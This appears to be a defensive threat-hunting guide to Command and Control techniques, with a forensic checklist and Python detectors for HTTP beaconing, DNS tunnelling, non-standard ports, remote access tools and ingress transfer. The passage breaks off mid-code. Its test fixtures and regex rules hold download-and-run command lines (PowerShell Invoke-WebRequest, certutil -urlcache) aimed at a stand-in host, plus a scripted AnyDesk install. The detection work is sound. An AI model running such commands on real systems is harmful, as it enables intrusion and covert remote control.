Command and Control (C2) (TA0011) Techniques
Introduction
Forensically investigating Command and Control (C&C) techniques on workstations and server systems involves identifying how an attacker communicates with compromised systems to control them remotely and potentially exfiltrate data. This process is critical for understanding the scope of an attack and mitigating further risks.
1. Understanding Common C&C Techniques
Direct Connections: Using tools like remote desktop, SSH, or VNC.
HTTP/HTTPS-Based Communication: Often disguised as normal web traffic.
DNS-Based Communication: Using DNS queries to send commands or exfiltrate data.
Use of Proxy Servers: To route and obfuscate the traffic.
Social Media and Cloud Services: Utilising popular platforms to disguise communication.
2. Data Collection and Preservation
Forensic Imaging: Create exact images of affected systems using tools like FTK Imager or dd.
Memory Capture: Use tools like Magnet RAM Capture or WinPmem for capturing volatile memory, which may contain remnants of C&C communication.
Log Collection: Gather network logs, firewall logs, DNS logs, system logs, and web proxy logs.
3. Network Traffic Analysis
Traffic Capture and Analysis: Use tools like Wireshark or Tcpdump to analyse network traffic for unusual patterns, especially outbound connections to unknown IPs or domains.
Protocol Analysis: Look for anomalies in standard protocols (HTTP, DNS, etc.) that could indicate C&C activities.
Decryption of Traffic: Where possible, decrypt encrypted network traffic to inspect the contents for command and control communication.
4. DNS Query Analysis
Logs Review: Examine DNS query logs for frequent or irregular requests to uncommon domains, which could be indicative of DNS tunnelling.
5. Firewall and Proxy Logs Analysis
Outbound Traffic: Check for any rules or logs that show unusual outbound traffic, especially traffic bypassing standard network egress points.
6. Endpoint Analysis
Running Processes: Analyse running processes and their network activity for signs of C&C communications.
Startup Items and Scheduled Tasks: Check for persistence mechanisms that may initiate C&C communication upon system restart.
Host-based Intrusion Detection Systems: Review alerts and logs for signs of C&C behaviour.
7. Malware Analysis (if applicable)
Static and Dynamic Analysis: If malware is identified, perform static and dynamic analysis to understand its communication mechanisms.
Reverse Engineering: Reverse-engineering malware may reveal built-in C&C domains or IP addresses.
8. Use of Specialised Forensic Tools
Forensic Suites: Tools like EnCase, Autopsy, or X-Ways for comprehensive system analysis.
Network Analysis Tools: Wireshark, Tcpdump, NetWitness, NetworkMiner for network traffic analysis.
9. Documentation and Reporting
Detailed Documentation: Record all methodologies, findings, and tools used.
Forensic Report: Compile a comprehensive report detailing the C&C investigation, findings, and implications.
10. Post-Investigation Actions
Mitigation and Remediation: Implement measures to disrupt the C&C channels and prevent further unauthorised access.
Recovery and Notifications: Restore systems and notify relevant stakeholders as per organisational and legal requirements.
Tools to Consider
Forensic Imaging: EnCase, AXIOM Cyber, FTK Imager, dd
Memory Capture: Magnet RAM Capture, WinPmem
Network Analysis: Wireshark, Tcpdump, NetWitness, NetworkMiner
Forensic Suites: EnCase, AXIOM Cyber, Binalyze-Air, Autopsy
Key Considerations
Legal Compliance: Ensure the investigation complies with relevant laws and regulations, especially when decrypting traffic.
Chain of Custody: Maintain an accurate chain of custody for all forensic evidence.
Data Confidentiality: Handle all data securely, maintaining its confidentiality and integrity.
C&C investigation requires a multi-faceted approach, combining network analysis, endpoint inspection, and potentially malware analysis to fully understand the attacker's methods and impact. Tailoring the investigation to the specifics of the incident and the environment is crucial.
Using KQL to Investigate Command and Control (C2) Activities in an Environment Using Defender/Sentinel
Command and Control (C2) techniques involve adversaries communicating with compromised systems to control them, exfiltrate data, or execute commands remotely.
1. T1071.001 - Application Layer Protocol: Web Protocols
Objective: Detect and investigate the use of web protocols (HTTP/HTTPS) for Command and Control communication.
Detect Unusual HTTP/HTTPS Traffic
Purpose: Identify unusual HTTP/HTTPS traffic patterns that may indicate C2 communication.
Monitor for Suspicious User-Agent Strings
Purpose: Detect suspicious or uncommon User-Agent strings used by C2 tools.
Identify HTTP/HTTPS Traffic to Uncommon Ports
Purpose: Monitor for web traffic over non-standard ports that may indicate C2 communication.
Detect HTTP POST Requests with Large Payloads
Purpose: Identify large HTTP POST requests that could be exfiltrating data.
Monitor for HTTP Traffic with Suspicious Headers
Purpose: Detect HTTP requests with unusual or suspicious headers that may be used in C2 communication.
Identify HTTP/HTTPS Traffic to Known Malicious Domains
Purpose: Monitor for HTTP/HTTPS traffic to domains associated with C2 infrastructure.
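The checks listed above for T1071.001, expressed as detection logic rather than as KQL, so the thresholds and their interaction can be seen in one place. This is an added example, not part of the original page and not a Defender or Sentinel query: the event records, the User-Agent allowlist, the placeholder C2 domain, the header names and the size thresholds are all constructed for illustration (the field names only loosely mirror DeviceNetworkEvents). It goes one step beyond the list by also scoring beaconing, the near-regular request interval that a polling implant produces and that none of the per-event checks can see on their own.

```python
"""Heuristics for HTTP/HTTPS C2 detection over constructed web event records.
Added example: the records, allowlists and thresholds are illustrative, not
Defender/Sentinel tables, though the field names loosely mirror DeviceNetworkEvents."""
from collections import defaultdict
from statistics import mean, pstdev
from urllib.parse import urlsplit

# Constructed allowlist of User-Agent prefixes seen from managed hosts in this environment.
KNOWN_UA_PREFIXES = ("Mozilla/5.0", "Microsoft-Delivery-Optimization", "Microsoft-CryptoAPI")
# Constructed placeholder threat-intel entry; real lists come from your TI feed.
KNOWN_C2_DOMAINS = {"c2.example.invalid"}
# Constructed list of non-standard request header names worth a second look.
SUSPICIOUS_HEADERS = {"x-session", "x-cmd", "x-task"}
LARGE_POST_BYTES = 1_000_000  # POST bodies above ~1 MB are rare for ordinary browsing


def host_of(url: str) -> str:
    return (urlsplit(url).hostname or "").lower()


def check_event(ev: dict) -> list:
    """Return the reasons a single HTTP event looks suspicious (empty list if none)."""
    reasons = []
    ua = ev.get("user_agent", "")
    if not ua.startswith(KNOWN_UA_PREFIXES):
        reasons.append("unusual-user-agent")
    if ev.get("method") == "POST" and ev.get("request_bytes", 0) > LARGE_POST_BYTES:
        reasons.append("large-post")
    if SUSPICIOUS_HEADERS & {h.lower() for h in ev.get("headers", [])}:
        reasons.append("suspicious-header")
    if host_of(ev["url"]) in KNOWN_C2_DOMAINS:
        reasons.append("known-c2-domain")
    return reasons


def beacon_candidates(events: list, min_hits: int = 6, max_jitter: float = 0.2) -> dict:
    """Group events by (device, host) and flag hosts contacted at near-regular intervals.

    A low coefficient of variation (stdev / mean) of the gaps between requests is the
    classic signature of a C2 beacon with limited jitter. Returns {key: mean_gap_seconds}.
    """
    stamps_by_key = defaultdict(list)
    for ev in events:
        stamps_by_key[(ev["device"], host_of(ev["url"]))].append(ev["ts"])
    found = {}
    for key, stamps in stamps_by_key.items():
        if len(stamps) < min_hits:
            continue
        stamps.sort()
        gaps = [b - a for a, b in zip(stamps, stamps[1:])]
        avg = mean(gaps)
        if avg > 0 and pstdev(gaps) / avg <= max_jitter:
            found[key] = round(avg, 1)
    return found


def triage(events: list) -> dict:
    """Per-device summary: sorted reasons from the per-event checks plus any beacon hits."""
    summary = defaultdict(set)
    for ev in events:
        summary[ev["device"]].update(check_event(ev))
    for (device, host), gap in beacon_candidates(events).items():
        summary[device].add(f"beacon:{host}:{gap}s")
    return {d: sorted(r) for d, r in summary.items()}


# Constructed sample: ws01 polls a placeholder C2 host about once a minute with a
# little jitter; ws02 sends one very large POST to an internal file service.
_JITTER = [0, 3, 1, 4, 2, 3, 1, 2]
SAMPLE_EVENTS = [
    {"device": "ws01", "ts": 60 * i + _JITTER[i], "url": "https://c2.example.invalid/ping",
     "method": "GET", "user_agent": "curl/7.1", "headers": ["X-Session"], "request_bytes": 40}
    for i in range(8)
] + [
    {"device": "ws01", "ts": 17, "url": "https://intranet.example.invalid/", "method": "GET",
     "user_agent": "Mozilla/5.0 (Windows NT 10.0)", "headers": [], "request_bytes": 120},
    {"device": "ws02", "ts": 300, "url": "https://files.example.invalid/upload", "method": "POST",
     "user_agent": "Mozilla/5.0 (Windows NT 10.0)", "headers": [], "request_bytes": 5_000_000},
]

if __name__ == "__main__":
    for device, reasons in triage(SAMPLE_EVENTS).items():
        print(device, reasons)
```

The per-event checks are cheap and map one-to-one onto the bullet points above; the beacon check is where the real signal usually is, because a User-Agent can be copied from a browser and a domain can be fresh, but an implant that sleeps for a fixed interval still leaves the regular gap pattern in the proxy log.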
2. T1071.004 - Application Layer Protocol: DNS
Objective: Detect and investigate the use of DNS for Command and Control communication.
Detect DNS Queries to Suspicious Domains
Purpose: Identify DNS queries to suspicious top-level domains often used by attackers.
Monitor for High-Frequency DNS Queries
Purpose: Detect high-frequency DNS queries that may indicate DNS tunnelling.
Identify DNS Queries for Uncommon Record Types
Purpose: Monitor for DNS queries with uncommon record types that could be used for C2.
Detect DNS Queries with Long or Suspicious Subdomains
Purpose: Identify DNS queries with unusually long subdomains that may indicate DNS tunnelling.
Monitor for DNS Queries to Dynamic DNS Providers
Purpose: Detect DNS queries to dynamic DNS providers, which are often used for C2.
Identify DNS Queries to Known Malicious C2 Domains
Purpose: Monitor for DNS queries to domains associated with C2 infrastructure.
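The DNS checks above (T1071.004) and the DNS query log review described earlier under "4. DNS Query Analysis" both come down to the same heuristics, so one worked example serves both passages. It is an added example, not code from the page and not a KQL query: the log records, the TLD and dynamic-DNS lists, the placeholder C2 domain and all thresholds are constructed. Beyond the listed checks it scores label entropy and counts distinct subdomains per client and domain, which is how tunnelling separates from an ordinary busy resolver.

```python
"""DNS query heuristics for C2 and tunnelling detection over constructed DNS log records.
Added example: the records mirror the shape of a DNS log (client, query name, record
type) but are constructed, as are the suffix lists and thresholds."""
import math
from collections import defaultdict

SUSPICIOUS_TLDS = {"xyz", "top", "tk"}                      # constructed sample of abused TLDs
DYNDNS_SUFFIXES = ("duckdns.org", "no-ip.org", "dynu.com")  # well-known dynamic DNS providers
KNOWN_C2_DOMAINS = {"c2.example.invalid"}                   # placeholder TI entry
RARE_QTYPES = {"TXT", "NULL", "ANY"}                        # record types favoured by tunnels
MAX_SUBDOMAIN_LEN = 30        # total length of the labels left of the registered domain
MIN_LABEL_FOR_ENTROPY = 12    # only score labels long enough for entropy to mean something
ENTROPY_THRESHOLD = 3.5       # bits per character; encoded payloads score well above this
DISTINCT_SUBDOMAIN_THRESHOLD = 20  # unique names per (client, domain) before flagging


def shannon_entropy(text: str) -> float:
    """Bits of entropy per character of `text`."""
    if not text:
        return 0.0
    counts = {}
    for ch in text:
        counts[ch] = counts.get(ch, 0) + 1
    n = len(text)
    return -sum(c / n * math.log2(c / n) for c in counts.values())


def registered_domain(name: str) -> str:
    """Naive registrable domain: the last two labels. Ignores multi-label public
    suffixes such as co.uk; use a public-suffix library in production."""
    labels = name.lower().rstrip(".").split(".")
    return ".".join(labels[-2:])


def classify_query(name: str, qtype: str) -> list:
    """Return the reasons one DNS query looks suspicious, in a fixed order."""
    name = name.lower().rstrip(".")
    labels = name.split(".")
    domain = registered_domain(name)
    sub_labels = labels[:-2]
    reasons = []
    if name in KNOWN_C2_DOMAINS or domain in KNOWN_C2_DOMAINS:
        reasons.append("known-c2-domain")
    if labels[-1] in SUSPICIOUS_TLDS:
        reasons.append("suspicious-tld")
    if any(name == s or name.endswith("." + s) for s in DYNDNS_SUFFIXES):
        reasons.append("dyndns")
    if qtype.upper() in RARE_QTYPES:
        reasons.append("rare-qtype")
    if len(".".join(sub_labels)) > MAX_SUBDOMAIN_LEN:
        reasons.append("long-subdomain")
    if any(len(lab) >= MIN_LABEL_FOR_ENTROPY and shannon_entropy(lab) >= ENTROPY_THRESHOLD
           for lab in sub_labels):
        reasons.append("high-entropy-label")
    return reasons


def tunnelling_volume(records: list) -> dict:
    """Flag (client, registered domain) pairs that query an unusually large number of
    distinct names: a tunnel encodes data in ever-changing labels, so the set of unique
    names grows with every message, unlike ordinary browsing of one site."""
    seen = defaultdict(set)
    for r in records:
        seen[(r["client"], registered_domain(r["name"]))].add(r["name"].lower())
    return {k: len(v) for k, v in seen.items() if len(v) >= DISTINCT_SUBDOMAIN_THRESHOLD}


# Constructed sample: one client emits 25 TXT queries whose leading label rotates a
# 32-character alphabet (entropy 5 bits/char); another resolves ordinary names.
_ALPHABET = "abcdefghijklmnopqrstuvwxyz012345"
SAMPLE_RECORDS = [
    {"client": "10.0.0.5", "name": f"{_ALPHABET[i:] + _ALPHABET[:i]}.t.tunnel.invalid", "qtype": "TXT"}
    for i in range(25)
] + [
    {"client": "10.0.0.9", "name": "www.example.invalid", "qtype": "A"},
    {"client": "10.0.0.9", "name": "mail.example.invalid", "qtype": "A"},
    {"client": "10.0.0.9", "name": "host.duckdns.org", "qtype": "A"},
]

if __name__ == "__main__":
    for r in SAMPLE_RECORDS[:1] + SAMPLE_RECORDS[25:]:
        print(r["name"], classify_query(r["name"], r["qtype"]))
    print(tunnelling_volume(SAMPLE_RECORDS))
```

When running this over a real DNS log, tune MAX_SUBDOMAIN_LEN and ENTROPY_THRESHOLD against a baseline first: CDN and cloud hostnames are long and look random too, so the distinct-name count per client is usually the lower-noise signal of the set.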
3. T1095 - Non-Standard Port
Objective: Detect and investigate the use of non-standard ports for Command and Control communication.
Detect Network Traffic on Non-Standard Ports
Purpose: Identify network traffic on uncommon ports that may be used for C2.
Monitor for SSH Traffic on Non-Standard Ports
Purpose: Detect SSH connections on ports other than 22, which may indicate C2 communication.
Identify RDP Traffic on Non-Standard Ports
Purpose: Monitor for RDP connections on ports other than 3389, which may be used for stealthy C2.
Detect Web Traffic on Non-Standard Ports
Purpose: Identify HTTP/HTTPS traffic on non-standard ports, which may indicate C2 communication.
Monitor for FTP Traffic on Non-Standard Ports
Purpose: Detect FTP connections on ports other than 21, which may be used for data exfiltration or C2.
Identify Non-Standard Port Usage by Known Tools
Purpose: Monitor for the use of common network tools on non-standard ports.
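Port-based rules alone cannot tell SSH on 2222 from anything else on 2222, so the worked example below identifies the protocol from the first bytes of the stream (as a pcap from Wireshark or Tcpdump would provide) and then compares it with the port and with the client process, which covers each of the T1095 items above. This is an added example, not code from the page: the flow records, the expected-port table, the tool-to-protocol mapping and the "common ports" set are all constructed for this environment.

```python
"""Protocol/port mismatch detection over constructed flow records.
Added example: records carry the first payload bytes (available from a pcap or a
network sensor, not from Defender's DeviceNetworkEvents) plus process and port
fields; the allowlists are constructed for this illustration."""
from collections import defaultdict
from typing import Optional

# Ports on which each application protocol is expected in this environment (constructed).
EXPECTED_PORTS = {
    "ssh": {22}, "rdp": {3389}, "ftp": {21},
    "http": {80, 8080}, "https": {443, 8443},
}
# Client tools and the protocol they normally speak (constructed mapping).
TOOL_PROTOCOL = {"ssh.exe": "ssh", "mstsc.exe": "rdp", "ftp.exe": "ftp", "curl.exe": "https"}
# Broader set of ports that routinely carry outbound traffic; anything else is "uncommon".
COMMON_PORTS = set().union(*EXPECTED_PORTS.values()) | {
    25, 53, 88, 123, 135, 139, 389, 445, 587, 636, 993, 995}


def identify_protocol(payload: bytes) -> Optional[str]:
    """Identify the application protocol from the first bytes of the stream,
    independent of the port it rides on (banner / magic-byte matching)."""
    if payload.startswith(b"SSH-"):
        return "ssh"       # SSH identification string
    if payload.startswith(b"\x03\x00"):
        return "rdp"       # TPKT header that precedes the X.224 connection request
    if payload.startswith(b"\x16\x03"):
        return "https"     # TLS handshake record
    if payload[:4] in (b"GET ", b"POST", b"HEAD", b"PUT "):
        return "http"      # plaintext HTTP request line
    if payload.startswith((b"220 ", b"USER ")):
        return "ftp"       # FTP greeting / login
    return None


def flag_flow(flow: dict) -> list:
    """Reasons a single outbound flow is worth investigating, in a fixed order."""
    reasons = []
    port = flow["remote_port"]
    proto = identify_protocol(flow.get("payload", b""))
    if proto and port not in EXPECTED_PORTS[proto]:
        reasons.append(f"{proto}-on-nonstandard-port")
    process = flow.get("process", "").lower()
    tool_proto = TOOL_PROTOCOL.get(process)
    if tool_proto and port not in EXPECTED_PORTS[tool_proto]:
        reasons.append(f"{process}-on-nonstandard-port")
    if port not in COMMON_PORTS:
        reasons.append("uncommon-port")
    return reasons


def hunt(flows: list) -> dict:
    """Per-device list of (remote_ip, port, reasons) for flows that raised any reason."""
    hits = defaultdict(list)
    for f in flows:
        reasons = flag_flow(f)
        if reasons:
            hits[f["device"]].append((f["remote_ip"], f["remote_port"], reasons))
    return dict(hits)


# Constructed sample flows (addresses taken from the documentation ranges).
SAMPLE_FLOWS = [
    {"device": "ws01", "process": "ssh.exe", "remote_ip": "198.51.100.10", "remote_port": 2222,
     "payload": b"SSH-2.0-OpenSSH_9.0"},
    {"device": "ws01", "process": "curl.exe", "remote_ip": "198.51.100.20", "remote_port": 443,
     "payload": b"\x16\x03\x01\x00\xc8"},
    {"device": "ws02", "process": "mstsc.exe", "remote_ip": "203.0.113.7", "remote_port": 8443,
     "payload": b"\x03\x00\x00\x13"},
    {"device": "ws02", "process": "updater.exe", "remote_ip": "203.0.113.8", "remote_port": 4444,
     "payload": b"GET /c HTTP/1.1\r\n"},
]

if __name__ == "__main__":
    for device, rows in hunt(SAMPLE_FLOWS).items():
        print(device, rows)
```

The three reasons are deliberately independent: a protocol mismatch needs payload, a tool mismatch needs process telemetry, and the uncommon-port check needs neither, so the same rule set degrades gracefully when only one data source is available.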
4. T1219 - Remote Access Software
Objective: Detect and investigate the use of remote access software that may be used for C2.
Detect Execution of Common Remote Access Tools
Purpose: Identify the execution of common remote access tools.
Monitor for Installation of Remote Access Software
Purpose: Detect registry entries related to the installation of remote access software.
Identify Remote Access Traffic Patterns
Purpose: Monitor for network traffic patterns associated with remote access software.
Detect Use of Remote Access Software Over Non-Standard Ports
Purpose: Identify the use of remote access software over non-standard ports.
Monitor for PowerShell Commands Installing Remote Access Tools
Purpose: Detect PowerShell commands used to install remote access tools.
Identify Persistence Mechanisms for Remote Access Software
Purpose: Monitor for persistence mechanisms used by remote access software.
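The T1219 items above span three telemetry sources (process creation, registry writes, network connections), and the finding is only convincing when they corroborate each other. The worked example below is an added one, not code from the page: its process, registry and network records mirror the shape of DeviceProcessEvents, DeviceRegistryEvents and DeviceNetworkEvents but are constructed, the executable list is a constructed sample of widely used remote access products, and the per-tool port baseline is an assumption to verify against the vendor's current documentation. The Uninstall, Run/RunOnce and Services registry paths it matches are the standard Windows locations.

```python
"""Detection of remote access software execution, installation and persistence over
constructed endpoint telemetry. Added example: the records mirror the shape of
Defender's DeviceProcessEvents / DeviceRegistryEvents / DeviceNetworkEvents but are
constructed, as are the tool list and the port baseline."""
import re
from collections import defaultdict

# Constructed list of executables belonging to widely used remote access products.
REMOTE_ACCESS_TOOLS = {
    "anydesk.exe", "teamviewer.exe", "teamviewer_service.exe",
    "tvnserver.exe", "winvnc.exe", "screenconnect.clientservice.exe",
}
# Ports each tool is expected to use here (constructed baseline; verify with vendor docs).
EXPECTED_PORTS = {"anydesk.exe": {6568, 443, 80}, "teamviewer.exe": {5938, 443, 80}}
# Registry locations that record an installation or start a program at logon/boot.
INSTALL_KEYS = re.compile(r"\\CurrentVersion\\Uninstall\\", re.I)
PERSIST_KEYS = re.compile(r"\\CurrentVersion\\(Run|RunOnce)\\?|\\CurrentControlSet\\Services\\", re.I)
# Markers of a scripted or silent install inside a command line (constructed set).
INSTALL_MARKERS = re.compile(r"--install|/S\b|msiexec|Start-Process", re.I)
# Product names (executable name without .exe) to look for in command lines and registry data.
TOOL_NAME_PATTERN = re.compile("|".join(re.escape(t[:-4]) for t in REMOTE_ACCESS_TOOLS), re.I)


def flag_process(ev: dict) -> list:
    """Direct execution of a listed tool, or a shell/PowerShell command that installs one."""
    reasons = []
    name = ev["file_name"].lower()
    cmd = ev.get("command_line", "")
    if name in REMOTE_ACCESS_TOOLS:
        reasons.append(f"rat-executed:{name}")
    if (name in ("powershell.exe", "pwsh.exe", "cmd.exe")
            and TOOL_NAME_PATTERN.search(cmd) and INSTALL_MARKERS.search(cmd)):
        reasons.append("scripted-rat-install")
    return reasons


def flag_registry(ev: dict) -> list:
    """Registry writes that record an install or a persistence entry for a listed tool."""
    reasons = []
    haystack = f"{ev['key']} {ev.get('value_name', '')} {ev.get('value_data', '')}"
    if not TOOL_NAME_PATTERN.search(haystack):
        return reasons
    if INSTALL_KEYS.search(ev["key"]):
        reasons.append("rat-installed")
    if PERSIST_KEYS.search(ev["key"]):
        reasons.append("rat-persistence")
    return reasons


def flag_network(ev: dict) -> list:
    """Connections initiated by a listed tool, noting a port outside its baseline."""
    name = ev["process"].lower()
    expected = EXPECTED_PORTS.get(name)
    if expected is None:
        return []
    if ev["remote_port"] in expected:
        return [f"rat-traffic:{name}"]
    return [f"rat-traffic:{name}", "rat-nonstandard-port"]


def hunt(process_events, registry_events, network_events) -> dict:
    """Per-device sorted list of unique reasons across all three telemetry sources."""
    out = defaultdict(set)
    for ev in process_events:
        out[ev["device"]].update(flag_process(ev))
    for ev in registry_events:
        out[ev["device"]].update(flag_registry(ev))
    for ev in network_events:
        out[ev["device"]].update(flag_network(ev))
    return {d: sorted(r) for d, r in out.items() if r}


# Constructed sample telemetry: ws01 installs and runs a tool by script; ws02 is clean.
SAMPLE_PROCESS = [
    {"device": "ws01", "file_name": "powershell.exe",
     "command_line": 'powershell.exe -Command "Start-Process C:\\Users\\u\\Downloads\\AnyDesk.exe --install C:\\ProgramData\\AnyDesk"'},
    {"device": "ws01", "file_name": "AnyDesk.exe", "command_line": "AnyDesk.exe"},
    {"device": "ws02", "file_name": "notepad.exe", "command_line": "notepad.exe notes.txt"},
]
SAMPLE_REGISTRY = [
    {"device": "ws01", "key": r"HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\AnyDesk",
     "value_name": "DisplayName", "value_data": "AnyDesk"},
    {"device": "ws01", "key": r"HKLM\SYSTEM\CurrentControlSet\Services\AnyDesk",
     "value_name": "ImagePath", "value_data": r"C:\ProgramData\AnyDesk\AnyDesk.exe"},
    {"device": "ws02", "key": r"HKCU\Software\Microsoft\Windows\CurrentVersion\Run",
     "value_name": "OneDrive", "value_data": r"C:\Users\u\AppData\Local\Microsoft\OneDrive\OneDrive.exe"},
]
SAMPLE_NETWORK = [
    {"device": "ws01", "process": "AnyDesk.exe", "remote_ip": "203.0.113.40", "remote_port": 7070},
    {"device": "ws02", "process": "chrome.exe", "remote_ip": "203.0.113.41", "remote_port": 443},
]

if __name__ == "__main__":
    print(hunt(SAMPLE_PROCESS, SAMPLE_REGISTRY, SAMPLE_NETWORK))
```

In an environment where a remote access product is sanctioned, keep the rules but scope them: exclude the managed installer's parent process and the approved service account, so that what remains is an unmanaged copy installed by script, which is the case the T1219 guidance is really about.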
5. T1105 - Ingress Tool Transfer
Objective: Detect and investigate the transfer of tools or files into a compromised environment, often used to establish C2 channels.
Detect File Downloads from Suspicious Sources
Purpose: Identify file downloads from potentially malicious sources.
Monitor for Use of PowerShell to Download Files
Purpose: Detect PowerShell commands used to download files from the internet.
Identify Use of certutil for File Download
Purpose: Monitor for the use of certutil to download files, often used in fileless attacks.
Detect Use of FTP to Transfer Files
Purpose: Identify the use of FTP commands to transfer files into the environment.
Monitor for Execution of Downloaded Files
Purpose: Detect the execution of files downloaded to the default Downloads directory.
Identify Files Transferred Over SMB
Purpose: Monitor for files transferred over SMB shares, which may be used to introduce C2 tools.
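The T1105 items above all reduce to recognising a handful of download primitives in process command lines and file events. The worked example below implements them as a small rule set with constructed sample telemetry; it is an added example, not code from the page or a KQL query. The process and file records follow the shape of DeviceProcessEvents and DeviceFileEvents but are constructed (a remote_ip on a file-creation record is this example's way of marking a write that arrived over SMB), the URLs use the reserved example.invalid domain, and the certutil, ftp and bitsadmin switches it matches are the tools' documented ones.

```python
"""Ingress tool transfer detection over constructed endpoint telemetry.
Added example: process and file records follow the shape of Defender's
DeviceProcessEvents / DeviceFileEvents but are constructed; the patterns are the
download primitives the page lists (PowerShell cmdlets, certutil, FTP, SMB)."""
import re
from collections import defaultdict

# PowerShell download primitives, including the Windows PowerShell aliases.
PS_DOWNLOAD = re.compile(
    r"Invoke-WebRequest|\biwr\b|Invoke-RestMethod|\birm\b|Start-BitsTransfer|"
    r"DownloadString|DownloadFile|Net\.WebClient|\bcurl\b|\bwget\b", re.I)
# certutil used as a downloader (-urlcache with -f) or as a base64 decoder (-decode).
CERTUTIL_DOWNLOAD = re.compile(r"-urlcache\b.*\s-f\b|\s-f\b.*-urlcache\b", re.I)
CERTUTIL_DECODE = re.compile(r"\s-decode\b", re.I)
# Scripted FTP session (-s:<script>) and a BITS job created from the command line.
FTP_SCRIPT = re.compile(r"\bftp(\.exe)?\b.*\s-s:", re.I)
BITSADMIN_TRANSFER = re.compile(r"\bbitsadmin(\.exe)?\b.*/transfer\b", re.I)
URL = re.compile(r"https?://[^\s'\"]+", re.I)
EXECUTABLE_EXT = (".exe", ".dll", ".ps1", ".bat", ".vbs", ".js", ".msi", ".scr")


def flag_process(ev: dict) -> list:
    """Reasons one process-creation event looks like a tool transfer or its follow-up."""
    name = ev["file_name"].lower()
    cmd = ev.get("command_line", "")
    folder = ev.get("folder_path", "")
    reasons = []
    if name in ("powershell.exe", "pwsh.exe") and PS_DOWNLOAD.search(cmd):
        reasons.append("powershell-download")
    if name == "certutil.exe" and CERTUTIL_DOWNLOAD.search(cmd):
        reasons.append("certutil-download")
    if name == "certutil.exe" and CERTUTIL_DECODE.search(cmd):
        reasons.append("certutil-decode")
    if name == "ftp.exe" and FTP_SCRIPT.search(cmd):
        reasons.append("ftp-scripted-transfer")
    if name == "bitsadmin.exe" and BITSADMIN_TRANSFER.search(cmd):
        reasons.append("bitsadmin-transfer")
    if re.search(r"\\Downloads(\\|$)", folder, re.I) and name.endswith(EXECUTABLE_EXT):
        reasons.append("exec-from-downloads")
    return reasons


def flag_file(ev: dict) -> list:
    """Reasons one file event looks like an inbound tool: an executable written over
    SMB from a remote host, or one carrying a download origin URL."""
    reasons = []
    path = ev["path"].lower()
    if ev.get("remote_ip") and path.endswith(EXECUTABLE_EXT) and ev.get("action") == "FileCreated":
        reasons.append(f"smb-drop-from:{ev['remote_ip']}")
    if ev.get("origin_url") and path.endswith(EXECUTABLE_EXT):
        reasons.append("downloaded-executable")
    return reasons


def extract_urls(process_events) -> set:
    """Collect the URLs named in flagged command lines for a quick threat-intel lookup."""
    urls = set()
    for ev in process_events:
        if flag_process(ev):
            urls.update(URL.findall(ev.get("command_line", "")))
    return urls


def hunt(process_events, file_events) -> dict:
    """Per-device sorted list of unique reasons from both telemetry sources."""
    out = defaultdict(set)
    for ev in process_events:
        out[ev["device"]].update(flag_process(ev))
    for ev in file_events:
        out[ev["device"]].update(flag_file(ev))
    return {d: sorted(r) for d, r in out.items() if r}


# Constructed sample telemetry. URLs use the reserved example.invalid domain.
SAMPLE_PROCESS = [
    {"device": "ws01", "file_name": "powershell.exe", "folder_path": r"C:\Windows\System32\WindowsPowerShell\v1.0",
     "command_line": 'powershell.exe -Command "Invoke-WebRequest -Uri http://example.invalid/tool.exe -OutFile C:\\Users\\u\\Downloads\\tool.exe"'},
    {"device": "ws01", "file_name": "certutil.exe", "folder_path": r"C:\Windows\System32",
     "command_line": "certutil.exe -urlcache -split -f http://example.invalid/t.exe t.exe"},
    {"device": "ws01", "file_name": "tool.exe", "folder_path": r"C:\Users\u\Downloads", "command_line": "tool.exe"},
    {"device": "ws02", "file_name": "certutil.exe", "folder_path": r"C:\Windows\System32",
     "command_line": "certutil.exe -verify cert.cer"},
    {"device": "ws02", "file_name": "ftp.exe", "folder_path": r"C:\Windows\System32",
     "command_line": "ftp.exe -s:C:\\Temp\\get.txt 198.51.100.5"},
]
SAMPLE_FILES = [
    {"device": "ws03", "action": "FileCreated", "path": r"C:\Windows\Temp\svc.exe", "remote_ip": "10.0.0.77"},
    {"device": "ws01", "action": "FileCreated", "path": r"C:\Users\u\Downloads\tool.exe",
     "origin_url": "http://example.invalid/tool.exe"},
    {"device": "ws02", "action": "FileModified", "path": r"C:\Users\u\Documents\notes.txt"},
]

if __name__ == "__main__":
    print(hunt(SAMPLE_PROCESS, SAMPLE_FILES))
    print(extract_urls(SAMPLE_PROCESS))
```

The certutil rule illustrates why the check is on the switch combination and not on the binary: certutil.exe -verify is routine administration and must not fire, while -urlcache together with -f has no legitimate purpose on a workstation outside software packaging.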
6. T1213.002 - Data from Information Repositories: Confluence
Objective: Detect and investigate the use of Confluence (or similar information repositories) for C2 communication or data exfiltration.
Detect Access to Confluence Pages
Purpose: Identify access to Confluence pages, which could be used for data exfiltration or C2 communication.
Monitor for Downloads from Confluence
Purpose: Detect bulk downloads from Confluence that may indicate data collection or exfiltration.
Identify Confluence API Access for Data Extraction
Purpose: Monitor for the use of Confluence APIs to extract data.
Detect Use of PowerShell for Confluence Data Access
Purpose: Identify PowerShell commands that access or extract data from Confluence.
Monitor for Unusual Access Patterns in Confluence
Purpose: Detect unusual access patterns to Confluence that may indicate C2 or exfiltration activities.
Identify Large Data Transfers from Confluence
Purpose: Monitor for large data transfers from Confluence, which could indicate significant data exfiltration.
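The six Confluence checks above are all per-user aggregates over the same access log, so the worked example below computes them together from one pass over constructed records. It is an added example, not code from the page: the records are shaped like proxy or application log lines (user, timestamp, URL, bytes returned, User-Agent) and constructed, the internal hostname and thresholds are placeholders, the business-hours baseline is an assumption, and the REST and attachment path fragments are the common Confluence routes, assumed here rather than taken from the page.

```python
"""Information-repository access analysis (Confluence) over constructed web access records.
Added example: records are shaped like proxy/application log lines and are constructed;
the Confluence path fragments are the common REST and attachment routes (assumed)."""
import bisect
from collections import defaultdict
from urllib.parse import urlsplit

CONFLUENCE_HOSTS = {"confluence.example.invalid"}      # constructed internal host
API_PATHS = ("/rest/api/content", "/rest/api/search")  # Confluence REST routes (assumed)
ATTACHMENT_PATH = "/download/attachments/"             # attachment download route (assumed)
SCRIPT_UA_PREFIXES = ("PowerShell", "python-requests", "curl/", "Go-http-client")
WINDOW_SECONDS = 600
BULK_REQUESTS = 50                  # requests by one user inside WINDOW_SECONDS
BULK_ATTACHMENTS = 10               # attachment downloads by one user over the period
LARGE_TRANSFER_BYTES = 100_000_000  # bytes returned to one user over the period
BUSINESS_HOURS = range(7, 20)       # constructed baseline: 07:00-19:59 local


def is_confluence(url: str) -> bool:
    return (urlsplit(url).hostname or "").lower() in CONFLUENCE_HOSTS


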